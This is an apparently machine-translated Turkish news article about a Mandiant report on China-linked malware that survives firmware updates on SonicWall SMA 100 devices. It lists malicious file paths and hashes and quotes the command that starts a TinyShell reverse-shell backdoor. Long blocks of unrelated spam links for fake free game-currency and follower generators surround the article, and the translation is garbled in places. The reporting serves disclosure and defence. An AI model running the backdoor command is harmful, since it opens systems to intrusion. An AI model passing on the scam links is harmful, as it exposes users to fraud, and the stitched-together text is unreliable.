https://kumu.io/trucojuegos/nuevo-generador-de-seguidores-en-tiktok-gratis-para-ios-y-android https://kumu.io/trucojuegos/1000-seguidores-en-tiktok-gratis-para-ios-y-android-asd98s9dffdhgfh https://kumu.io/diamantesfreefire/diamantes-para-free-fire-gratis-rapido-y-real-2025-apk https://kumu.io/diamantesfreefire/como-se-gana-diamantes-gratis-free-fire-para-ios-y-android-2025 https://kumu.io/diamantesfreefire/real5600-diamantes-free-fire-gratis-hack-ios-y-android https://kumu.io/diamantesfreefire/real-diamantes-gratis-free-fire-hack-para-ios-y-android-max https://nothingbuttop10.bandcamp.com/album/kumu-descargar-free-fire-max-9999 https://hackmd.io/@b5KLTCE3RViedJhnKQZl-Q/BkXRYaSPlg https://lichess.org/team/nuevo-1000-seguidores-en-tiktok-gratis-para-ios-y-android https://lichess.org/team/nuevo-generador-de-seguidores-en-tiktok-gratis-ios-android https://lichess.org/team/metodo-5600-diamantes-free-fire-gratis-para-ios-y-android https://lichess.org/team/approved-cod-mobile-free-cp-ios--android-no-verification https://lichess.org/team/latest-free-cod-mobile-cp-for-ios--android-unlimited https://lichess.org/team/claimcp-free--cod-mobile-free-cp-ios-android https://nothingbuttop10.bandcamp.com/album/lichess-cod-mobile-cp https://linktr.ee/diamanten_gratis_chapters https://reach.link/gratis-diamanten-bei-chapters https://kumu.io/gratisdiamantenbeichapters/neueste-gratis-diamanten-bei-chapters-hack-auf-deutsch-ios-android https://kumu.io/gratisdiamantenbeichapters/unendlich-diamanten-bei-chapters-cheats-auf-deutsch https://www.weareplaystation.fr/communautes/jeux-independants/astuces/wiki/nouveau-liens-des-gratuits-monopoly-go-ios-android-du-juillet-29-2025 https://www.weareplaystation.fr/communautes/jeux-independants/astuces/wiki/astuce-monopoly-go-triche-generateur-de-des-gratuit-pour-ios-et-android-en-ligne-99sdf https://nothingbuttop10.bandcamp.com/album/9999-links-lets-go https://aetherhub.com/Tourney/RoundTourney/67327 https://aetherhub.com/Tourney/RoundTourney/67333 https://aetherhub.com/Tourney/RoundTourney/67334 https://aetherhub.com/Tourney/RoundTourney/67335 https://aetherhub.com/Tourney/RoundTourney/67336 https://aetherhub.com/Tourney/RoundTourney/67337 https://aetherhub.com/Tourney/RoundTourney/67338 https://aetherhub.com/Tourney/RoundTourney/67339 https://aetherhub.com/Tourney/RoundTourney/67340 https://aetherhub.com/Tourney/RoundTourney/67341 https://nothingbuttop10.bandcamp.com/album/tik-ff-outbound-links https://aetherhub.com/Tourney/RoundTourney/67640 https://aetherhub.com/Tourney/RoundTourney/67654 https://aetherhub.com/Tourney/RoundTourney/67655 https://aetherhub.com/Tourney/RoundTourney/67656 https://aetherhub.com/Tourney/RoundTourney/67657 https://aetherhub.com/Tourney/RoundTourney/67658 https://aetherhub.com/Tourney/RoundTourney/67659 https://aetherhub.com/Tourney/RoundTourney/67660 https://aetherhub.com/Tourney/RoundTourney/67661 https://aetherhub.com/Tourney/RoundTourney/67663 https://aetherhub.com/Tourney/RoundTourney/67669 https://aetherhub.com/Tourney/RoundTourney/67673 https://aetherhub.com/Tourney/RoundTourney/67640/?generator9 https://aetherhub.com/Tourney/RoundTourney/67654/?generator8 https://aetherhub.com/Tourney/RoundTourney/67655/?generator7 https://aetherhub.com/Tourney/RoundTourney/67656/?generator6 https://aetherhub.com/Tourney/RoundTourney/67657/?generator5 https://aetherhub.com/Tourney/RoundTourney/67658/?generator4 https://aetherhub.com/Tourney/RoundTourney/67659/?generator3 https://aetherhub.com/Tourney/RoundTourney/67660/?generator2 https://aetherhub.com/Tourney/RoundTourney/67661/?generator1 https://aetherhub.com/Tourney/RoundTourney/67663/?generator22 https://aetherhub.com/Tourney/RoundTourney/67669/?generator11 https://aetherhub.com/Tourney/RoundTourney/67673/?generator33 https://nothingbuttop10.bandcamp.com/album/aether-bonus-obl-999 https://paddling.com/paddle/trips/greatness-pubg-mobile-free-uc-bp-for-ios-android-pubg-mobile-unlimited-uc-generator-999k https://paddling.com/paddle/trips/yes-clash-of-clans-free-gems-ios-android-clash-of-clans-unlimited-gems-generator-updated-999k https://paddling.com/paddle/trips/wow-stumble-guys-free-gems-ios-android-stumble-guys-free-gems-generator-updated-999k https://paddling.com/paddle/trips/glitch-brawl-stars-free-gems-ios-android-brawl-stars-unlimited-gems-generator-updated-9999k https://paddling.com/paddle/trips/claim-apex-legends-free-coins-ios-android-apex-legends-coins-generator-updated-9999k https://paddling.com/paddle/trips/approved-dragon-city-free-gems-ios-android-dragon-city-unlimited-gems-updated-cheats https://paddling.com/paddle/trips/latest-bigo-live-free-diamonds-ios-android-bigo-live-diamonds-generator-unlimited-beans https://paddling.com/paddle/trips/greatness-pubg-mobile-free-uc-bp-for-ios-android-pubg-mobile-unlimited-uc-generator-999k/?adr https://paddling.com/paddle/trips/yes-clash-of-clans-free-gems-ios-android-clash-of-clans-unlimited-gems-generator-updated-999k/?wdf https://paddling.com/paddle/trips/wow-stumble-guys-free-gems-ios-android-stumble-guys-free-gems-generator-updated-999k/?asdc https://paddling.com/paddle/trips/glitch-brawl-stars-free-gems-ios-android-brawl-stars-unlimited-gems-generator-updated-9999k/?dwuq https://paddling.com/paddle/trips/claim-apex-legends-free-coins-ios-android-apex-legends-coins-generator-updated-9999k/?dfur https://paddling.com/paddle/trips/approved-dragon-city-free-gems-ios-android-dragon-city-unlimited-gems-updated-cheats/?sdfi https://paddling.com/paddle/trips/latest-bigo-live-free-diamonds-ios-android-bigo-live-diamonds-generator-unlimited-beans/?asfiu https://nothingbuttop10.bandcamp.com/album/latest-paddling-outbound-links

Thu. Jul 31st, 2025
Yaygın olarak kullanılan güvenlik cihazına bulaşan kötü amaçlı yazılım, üretici yazılımı güncellemelerinden kurtulur

Araştırmacılar, Çin hükümetiyle bağlantısı olan tehdit aktörlerinin, SonicWall’ın yaygın olarak kullanılan bir güvenlik cihazına, cihaz üretici yazılımı güncellemelerini aldıktan sonra bile aktif kalan kötü amaçlı yazılım bulaştırdığını söyledi.

SonicWall’lar Güvenli Mobil Erişim 100 kuruluşların uzak iş gücünü güvenli bir şekilde dağıtmasına yardımcı olan güvenli bir uzaktan erişim aracıdır. Müşteriler, uzak kullanıcılara ayrıntılı erişim denetimleri vermek, kuruluş ağlarına VPN bağlantıları sağlamak ve her çalışan için benzersiz profiller ayarlamak için kullanır. SMA 100’ün müşteri ağlarına erişimi, onu tehdit aktörleri için çekici bir hedef haline getiriyor.

2021 yılında cihaz saldırıya uğradı o zamanlar sıfırıncı gün güvenlik açığı olan şeyi kullanan sofistike bilgisayar korsanları tarafından. Güvenlik cihazları Fortinet Ve Nabız Güvenli son yıllarda benzer saldırılara maruz kaldı.

Ağlar içinde uzun vadeli kalıcılık elde etme

Perşembe günü, güvenlik firması Mandiant bir rapor Çin ile şüpheli bir bağlantıya sahip olan tehdit aktörlerinin, yama uygulanmamış SonicWall SMA cihazlarında kötü amaçlı yazılım çalıştırarak uzun vadeli kalıcılığı sürdürmek için bir kampanya yürüttüklerini söyledi. Kampanya, kötü amaçlı yazılımın, ürün yazılımı yeni ürün yazılımı aldıktan sonra bile cihazlarda kalabilmesi açısından dikkate değerdi.

Mandiant araştırmacıları Daniel Lee, Stephen Eckels ve Ben Read, “Saldırganlar araçlarının kararlılığı ve kalıcılığı için önemli çaba sarf ediyor” diye yazdı. “Bu, ağa erişimlerinin ürün yazılımı güncellemeleri aracılığıyla devam etmesine ve SonicWall Cihazı aracılığıyla ağ üzerinde bir yer tutmasına izin veriyor.”

Bu kalıcılığı sağlamak için, kötü amaçlı yazılım her 10 saniyede bir mevcut üretici yazılımı yükseltmelerini kontrol eder. Bir güncelleme kullanıma sunulduğunda, kötü amaçlı yazılım arşivlenmiş dosyayı yedekleme için kopyalar, sıkıştırılmış dosyayı açar, bağlar ve ardından tüm kötü amaçlı dosya paketini ona kopyalar. Kötü amaçlı yazılım, bağlanan dosyaya bir arka kapı kök kullanıcısı da ekler. Ardından, kötü amaçlı yazılım, yüklemeye hazır olması için dosyayı yeniden sıkıştırır.

Araştırmacılar, “Teknik özellikle karmaşık değil, ancak saldırganın cihaz güncelleme döngüsünü anlamak, ardından kalıcılık için bir yöntem geliştirmek ve test etmek için büyük çaba sarf ettiğini gösteriyor” diye yazdı.

Kalıcılık teknikleri, 16 kötü amaçlı yazılım ailesini kullanan 2021’deki bir saldırı kampanyasıyla tutarlıdır. Pulse Secure cihazlarına bulaşma. Mandiant saldırıları, şirketin “Çin hükümetinin temel önceliklerini” desteklediğini söylediği UNC2630, UNC2717 olarak izlenenler de dahil olmak üzere çok sayıda tehdit grubuna bağladı. Mandiant, SonicWall SMA 100 müşterilerine yönelik devam eden saldırıları UNC4540 olarak izlenen bir gruba bağladı.

“Son yıllarda Çinli saldırganlar, tam kurumsal izinsiz girişe giden bir yol olarak İnternet’e bakan çeşitli ağ aygıtları için birden çok sıfır gün açıklarından yararlanma ve kötü amaçlı yazılım dağıttı ve burada bildirilen örnek, Mandiant’ın devam etmesini beklediği yakın tarihli bir modelin parçası. yakın dönem,” diye yazdı Mandiant araştırmacıları Perşembe günkü raporunda.

Yüksek ayrıcalıklı erişim

Kötü amaçlı yazılımın ana amacı, oturum açmış tüm kullanıcılar için kriptografik olarak hashlenmiş parolaları çalmak gibi görünüyor. Ayrıca, tehdit aktörünün yeni kötü amaçlı yazılım yüklemek için kullanabileceği bir web kabuğu sağlar.

Araştırmacılar Perşembe günkü raporda, “Güvenliği ihlal edilmiş bir cihazın analizi, saldırganın cihaza son derece ayrıcalıklı ve erişilebilir bir erişim sağlayan bir dosya koleksiyonunu ortaya çıkardı” diye yazdı. “Kötü amaçlı yazılım, bir dizi bash betiğinden ve TinyShell varyantı olarak tanımlanan tek bir ELF ikili dosyasından oluşuyor. Kötü amaçlı bash betikleri paketinin genel davranışı, aracın ayrıntılı bir şekilde anlaşıldığını gösterir ve kararlılık ve kalıcılık sağlamak için sisteme iyi uyarlanmıştır.”

Kötü amaçlı yazılımların listesi:

Yol Doğramak İşlev
/bin/güvenlik duvarı e4117b17e3d14fe64f45750be71dbaa6 Ana kötü amaçlı yazılım süreci
/bin/httpsd 2d57bcb8351cf2b57c4fd2d1bb8f862e TinyShell arka kapısı
/etc/rc.d/rc.local 559b9ae2a578e1258e80c45a5794c071 Güvenlik duvarı için önyükleme kalıcılığı
/bin/iptabled 8dbf1effa7bc94fc0b9b4ce83dfce2e6 Yedekli ana kötü amaçlı yazılım süreci
/bin/geoBotnetd 619769d3d40a3c28ec83832ca521f521 Firmware arka kapı betiği
/bin/ifconfig6 fa1bf2e427b2defffd573854c35d4919 Zarif kapatma komut dosyası

Rapor şöyle devam etti:

Ana kötü amaçlı yazılım giriş noktası, adlı bir bash betiğidir. firewalldbirincil döngüsünü sistemdeki her dosyanın karesi için bir kez yürütür: …for j in $(ls / -R) do for i in $(ls / -R) do:… Betik, kimlik bilgilerinin çalınmasını ve diğer bileşenlerin çalıştırılmasını gerçekleştirmek için bir SQL komutunun yürütülmesinden sorumludur.

içindeki ilk işlev firewalld TinyShell arka kapısını yürütür httpsd komut ile nohup /bin/httpsd -c -d 5 -m -1 -p 51432 > /dev/null 2>&1 & Eğer httpsd işlem zaten çalışmıyor. Bu, TinyShell’i ters kabuk moduna ayarlayarak, yukarıda bahsedilen IP adresine ve bağlantı noktasına, tarafından temsil edilen belirli bir saat ve günde çağrı yapması talimatını verir. -m tarafından tanımlanan bir işaret aralığı ile bayrak -d bayrak. İkili, IP adresi bağımsız değişkeni boş bırakılırsa ters kabuk modunda kullanılan, sabit kodlanmış bir IP adresini katıştırır. Ayrıca bir dinleme bağlama kabuğu modu da mevcuttur.

Araştırmacılar, ilk enfeksiyon vektörünün ne olduğunu bilmediklerini söylediler.

Geçen hafta, SonicWall bir danışma bu, SMA 100 kullanıcılarını 10.2.1.7 veya daha yüksek bir sürüme yükseltmeye teşvik etti. Bu sürümler, Dosya Bütünlüğü İzleme ve anormal işlem tanımlama gibi geliştirmeleri içerir. yama mevcut Burada. Kullanıcılar ayrıca, anormal girişler veya dahili trafik dahil olmak üzere güvenlik ihlali belirtileri için günlükleri düzenli olarak incelemelidir.

By admin

https://paddling.com/paddle/trips/latest-free-imvu-credits-generator-for-ios-android-no-apk-unlimited-imvu-credits-free https://paddling.com/paddle/trips/approved-how-to-get-free-diamonds-in-free-fire-ios-android-free-fire-diamond-generator-c98dsg https://paddling.com/paddle/trips/codesarchero-free-gems-generator-for-ios-android-redeem-codes-archero-2-cheats-unlimited-gems https://paddling.com/paddle/trips/999chapters-interactive-stories-free-diamonds-tickets-ios-android-chapters-hack-free-diamonds https://paddling.com/paddle/trips/999kfree-episode-gems-and-passes-ios-android-episode-gems-passes-generator-hack-998ds https://paddling.com/paddle/trips/latest-free-stumble-guys-gems-generator-for-ios-android-stumble-guys-hack-ios-no-apk-8dsg https://nothingbuttop10.bandcamp.com/album/paddling-gaming-9888 https://linktr.ee/cartecadeauxboxlivegratuit https://reach.link/carte-cadeau-xboxlive-gratuits https://kumu.io/codexboxlivegratuit/nouveaucarte-cadeau-xbox-live-gratuit-en-ligne https://kumu.io/codexboxlivegratuit/methode-code-xbox-live-gratuits-code-xbox-live-gold-gratuites-en-ligne https://nothingbuttop10.bandcamp.com/album/cartecadeau-xbox-live-gold-en-ligne https://www.dogomania.com/forum/topic/374282-%F0%9F%8E%B2-monopoly-go-hack-%E2%80%93-gratis-w%C3%BCrfel-ohne-anmeldung-sichern-ios-und-android/ https://www.dogomania.com/forum/topic/374283-neueste-so-bekommst-du-gratis-w%C3%BCrfel-monopoly-go-hack-auf-deutsch-ios-und-android-99999k/ https://www.dogomania.com/forum/topic/374284-degratis-w%C3%BCrfel-und-kostenlose-w%C3%BCrfel-links-august-2025-monopoly-go-hack-deutsch-heute-ios-android/ https://www.dogomania.com/forum/topic/374279-nuovo-come-avere-dadi-gratis-su-monopoly-go-hack-italian-dadi-gratis-infinite-per-ios-e-android-8c90sag/ https://www.dogomania.com/forum/topic/374280-100-dadi-monopoli-go-trucchi-come-ottenere-dadi-gratis-link-luglio-2025-per-ios-e-android-998dsfdsg/ https://www.dogomania.com/forum/topic/374281-trucchi-link-dadi-monopoly-go-gratis-hack-telegram-reddit-facebook-per-ios-e-android-~-9999k/ https://paddling.com/paddle/trips/latest-cod-mobile-free-cp-ios-android-how-to-get-free-cod-points-for-call-of-duty-mobile https://paddling.com/paddle/trips/latest-cod-mobile-free-cp-ios-android-how-to-get-free-cod-points-for-call-of-duty-mobile-2 https://aetherhub.com/Tourney/RoundTourney/66772 https://aetherhub.com/Tourney/RoundTourney/66775 https://aetherhub.com/Tourney/RoundTourney/66796 https://aetherhub.com/Tourney/RoundTourney/66797 https://aetherhub.com/Tourney/RoundTourney/66799 https://aetherhub.com/Tourney/RoundTourney/66802 https://aetherhub.com/Tourney/RoundTourney/66804 https://aetherhub.com/Tourney/RoundTourney/66805 https://aetherhub.com/Tourney/RoundTourney/66806 https://aetherhub.com/Tourney/RoundTourney/66807 https://aetherhub.com/Tourney/RoundTourney/66808 https://aetherhub.com/Tourney/RoundTourney/66809 https://aetherhub.com/Tourney/RoundTourney/66810 https://aetherhub.com/Tourney/RoundTourney/66811 https://nothingbuttop10.bandcamp.com/album/aetherde-2025 https://aetherhub.com/Tourney/RoundTourney/66828 https://aetherhub.com/Tourney/RoundTourney/66833 https://aetherhub.com/Tourney/RoundTourney/66834 https://aetherhub.com/Tourney/RoundTourney/66835 https://paddling.com/paddle/trips/updatedcod-mobile-free-cp-generator-ios-android-9999k-no-verification-9999k https://paddling.com/paddle/trips/redeemcall-of-duty-mobile-free-cp-ios-android-unlimited-cod-points-hack-2025-9999k https://paddling.com/paddle/trips/latest-free-cod-mobile-free-cp-android-apk-unlimited-cod-points-for-call-of-duty-mobile https://paddling.com/paddle/trips/crazy-call-of-duty-mobile-free-cod-points-cp-for-ios-android-updated-9999k https://nothingbuttop10.bandcamp.com/album/paddling-gaming-outbound-cod-links https://paddling.com/paddle/trips/newestepisode-unlimited-passes-and-gems-generator-for-ios-android-episode-choose-your-story-hacks https://paddling.com/paddle/trips/episode-free-gems-and-passes-ios-android-how-to-get-unlimited-gems-passes-for-episode-free https://paddling.com/paddle/trips/latest-episode-gems-and-passes-generator-ios-android-updated-9999k-unlimited https://paddling.com/paddle/trips/new-chapters-interactive-stories-free-diamonds-generator-ios-android-cheat-codes https://paddling.com/paddle/trips/999k-chapters-unlimited-diamonds-and-tickets-ios-android-free-999k https://paddling.com/paddle/trips/realchapters-mod-apk-unlimited-tickets-and-diamonds-for-android-ios-updated-link https://paddling.com/paddle/trips/match-masters-free-coins-hack-cheats-for-match-masters-ios-android-app-free-gift-links-today https://paddling.com/paddle/trips/latest-match-masters-free-coins-booster-links-match-masters-free-gifts-daily-generator-ios-android https://paddling.com/paddle/trips/booster-match-masters-free-coins-ios-android-updated-links-free-unlimited-coins-match-masters-gifts https://nothingbuttop10.bandcamp.com/album/holloplays-outbound-links